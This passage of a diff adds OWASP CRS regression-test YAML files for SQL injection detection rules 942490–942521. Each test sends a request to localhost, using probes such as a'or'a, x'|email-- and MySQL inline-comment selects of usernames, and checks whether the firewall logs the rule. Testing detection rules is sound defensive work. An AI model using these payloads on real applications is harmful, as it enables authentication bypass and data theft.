dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-16 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":60" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-17 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-18 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":35" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-19 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-20 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-21 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='16/17" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-22 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\";}7b6" + version: HTTP/1.0 + output: + log_contains: id "942490" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml new file mode 100644 index 00000000..c99e1644 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml @@ -0,0 +1,39 @@ +--- +meta: + author: "Franziska Buehler" + description: None + enabled: true + name: 942500.yaml +tests: + - test_title: 942500-1 + desc: "MySQL in-line comment detection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" + - test_title: 942500-2 + desc: "Status Page Test - MySQL inline comment detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=9999+or+{if+length((/*!5000select+username/*!comment*/" + version: HTTP/1.0 + output: + log_contains: id "942500" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml new file mode 100644 index 00000000..a57e20af --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -0,0 +1,39 @@ +--- +meta: + author: "Franziska Buehler" + description: None + enabled: true + name: 942510.yaml +tests: + - test_title: 942510-1 + desc: "SQLi bypass detected: backticks" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?`bla`" + version: HTTP/1.0 + output: + log_contains: id "942510" + - test_title: 942510-2 + desc: "SQLi bypass detected: backticks" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?'bla'" + version: HTTP/1.0 + output: + no_log_contains: id "942510" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml new file mode 100644 index 00000000..797947b6 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -0,0 +1,39 @@ +--- +meta: + author: "Walter Hop" + description: None + enabled: true + name: 942511.yaml +tests: + - test_title: 942511-1 + desc: "SQLi bypass detected: quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?`bla`" + version: HTTP/1.0 + output: + no_log_contains: id "942511" + - test_title: 942511-2 + desc: "SQLi bypass detected: quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?'bla'" + version: HTTP/1.0 + output: + log_contains: id "942511" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml new file mode 100644 index 00000000..ce2aa97f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml @@ -0,0 +1,387 @@ +--- +meta: + author: "terjanq, Franziska Bühler" + description: "Detects basic SQL authentication bypass attempts 4.0/4" + enabled: true + name: 942520.yaml +tests: + - test_title: 942520-1 + desc: "Detects basic SQL auth bypass with 'is not something'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'is%20not-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-2 + desc: "Negative test: 'is notes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'is%20notes" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-3 + desc: "Detects basic SQL auth bypass with 'not like something'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20like%20id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-4 + desc: "Detects basic SQL auth bypass with 'not glob'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-5 + desc: "Detects basic SQL auth bypass with 'not like glob'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-6 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'|email-- + data: "var=x'%7Cemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-7 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'-email-- + data: "var=x'-email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-8 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'+email-- (there seem to be a bug with double encoding in tests) + data: "var=x'%252Bemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-9 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'^email-- + data: "var=x'%5Eemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-10 + desc: "Nagive test: Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'@email-- + data: "var=x'%40email--" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-11 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'&email-- + data: "var=x'%26email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-12 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'email-- + data: "var=x'%3Eemail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-14 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'=email-- + data: "var=x'%3Demail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-15 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'/email-- + data: "var=x'%2Femail--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-16 + desc: "Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'%email-- + data: "var=x'%25email--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-17 + desc: "Negative test: Detects basic SQL auth bypass with binary operators" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # x'~email-- + data: "var=x'~email--" + version: HTTP/1.0 + output: + no_log_contains: id "942520" + - test_title: 942520-18 + desc: "Detects basic SQL auth bypass with mod" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=x'%20mod%20id--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-19 + desc: "Detects basic SQL auth bypass with: sounds like" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='sounds%20like%20rowid--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-20 + desc: "Bypass with a comment" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='%2F**%2F*2--" + version: HTTP/1.0 + output: + log_contains: id "942520" + - test_title: 942520-21 + desc: "Integration test: 942521 blocks foo'or'oof" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=foo'or'oof" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942520-22 + desc: "Integration test: 942522 blocks foo\\''or'oof" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=foo%5c''or'oof" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942520-23 + desc: "Detect auth bypass email=' is not?--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "email=%27%20is%20not%3F--" + version: HTTP/1.0 + output: + log_contains: id "942520" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml new file mode 100644 index 00000000..848720a5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml @@ -0,0 +1,387 @@ +--- +meta: + author: "terjanq, Franziska Bühler" + description: "Detects basic SQL authentication bypass attempts 4.1/4" + enabled: true + name: 942521.yaml +tests: + - test_title: 942521-1 + desc: "Detects the most basic authentication bypass with 'or'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=a'or'a" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-2 + desc: "Detects basic SQLite authentication bypass with 'or?'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=a'or?--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-3 + desc: "False-positive: Detects or-based authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=is%20this%20your%20parents'%20or%20yours?" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-4 + desc: "Detects basic SQL auth bypass and-based" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=user'and%20id%20is%20not?--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-5 + desc: "False-positve: is it your parents' or yours" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=it%20is%20your%20parents'%20and%20yours" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-6 + desc: "Negative test: bob's or alice's" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=bob's%20or%20alice's" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-7 + desc: "Negative test: mother or daugher" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=mother%20or%20daughter" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-8 + desc: "Negative test: 'oreo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='oreo" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-9 + desc: "Negative test: 'fork" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='fork" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-10 + desc: "Negative test: 'for" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='%20for" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-11 + desc: "Negative test: ''or" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-12 + desc: "Negative test: 'books' or 'applles'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-13 + desc: "Negative test: bob's presentation's 'or'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-14 + desc: "Bypass with '''or 1" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='''or%201" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-15 + desc: "False-negative: Not detected with escapes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%5C'lol'%20or%20'1" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-16 + desc: "Negative test: Wikipedia article about SQLi" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-17 + desc: "Performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%